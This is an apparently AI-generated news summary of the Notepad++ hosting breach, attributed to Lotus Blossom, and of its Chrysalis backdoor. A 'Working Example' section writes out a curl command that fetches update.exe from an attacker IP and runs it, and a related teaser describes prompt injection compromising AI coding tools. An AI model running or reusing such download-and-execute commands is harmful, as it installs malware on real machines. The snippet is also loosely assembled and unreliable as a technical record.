Notepad++ Hosting Breach Attributed to China-Linked Lotus Blossom
These articles are AI-generated summaries. Please check the original sources for full details.
Notepad++ Hosting Breach Attributed to China-Linked Lotus Blossom
The Notepad++ hosting breach, attributed to the China-linked Lotus Blossom hacking group with medium confidence, enabled the threat actors to deliver a previously undocumented backdoor, codenamed Chrysalis, to users of the open-source editor. According to Rapid7, the attack exploited insufficient update verification controls in older versions of Notepad++, allowing the group to hijack update traffic starting June 2025.
Why This Matters
The Notepad++ breach highlights the technical reality of supply chain attacks, where ideal models of secure software updates are compromised by weaknesses in the hosting infrastructure. The cost of such breaches can be significant, with potential consequences including the theft of sensitive information and the disruption of critical systems. In this case, the breach was fixed in December 2025 with the release of version 8.8.9, but not before the attackers had selectively redirected update requests to malicious servers, potentially compromising high-profile organizations worldwide.
Key Insights
- Rapid7 attributed the Notepad++ breach to the China-linked Lotus Blossom hacking group with medium confidence, citing similarities with prior campaigns: “While the group continues to rely on proven techniques like DLL side-loading and service persistence, their multi-layered shellcode loader and integration of undocumented system calls mark a clear shift toward more resilient and stealth tradecraft.”
- The Chrysalis backdoor is a bespoke, feature-rich implant capable of gathering system information, contacting an external server, and processing incoming HTTP responses to spawn an interactive shell: “The sample looks like something that has been actively developed over time,” Rapid7 said.
- Kaspersky observed three different infection chains designed to target about a dozen machines belonging to individuals and organizations in APAC and South America, with the attackers constantly rotating C2 server addresses and payloads over four months.
Working Example
# Example of a malicious Notepad++ update hosted at a compromised URL
curl -s "45.76.155.202/update/update.exe" -o update.exe
# Launch the NSIS installer to deploy the Chrysalis backdoor
./update.exePractical Applications
- Use Case: The Notepad++ breach demonstrates the importance of secure software updates and the need for organizations to implement robust verification controls to prevent similar attacks.
- Pitfall: The use of insufficient update verification controls, as seen in the Notepad++ breach, can lead to the compromise of critical systems and the theft of sensitive information, highlighting the need for organizations to prioritize software security.
References:
Continue reading
Next article
OpenAI's Codex CLI Internals Revealed
Related Content
Notepad++ Update Mechanism Hijacked to Deliver Malware
State-backed attackers hijacked Notepad++ update traffic via a hosting provider breach, redirecting users to malicious downloads since June 2025.
Clinejection: How Prompt Injection Compromised AI Coding Tools for 4,000 Developers
The Clinejection attack turned Cline's GitHub Actions bot into a weapon, installing rogue agents on 4,000 developer machines via malicious npm updates in February 2026.
China-Linked Hackers Exploit Windows Shortcut Flaw to Target European Diplomats
A China-affiliated hacking group, UNC6384, exploited an unpatched Windows vulnerability (CVE-2025-9491) to target European diplomatic and government entities through spear-phishing campaigns and PlugX malware.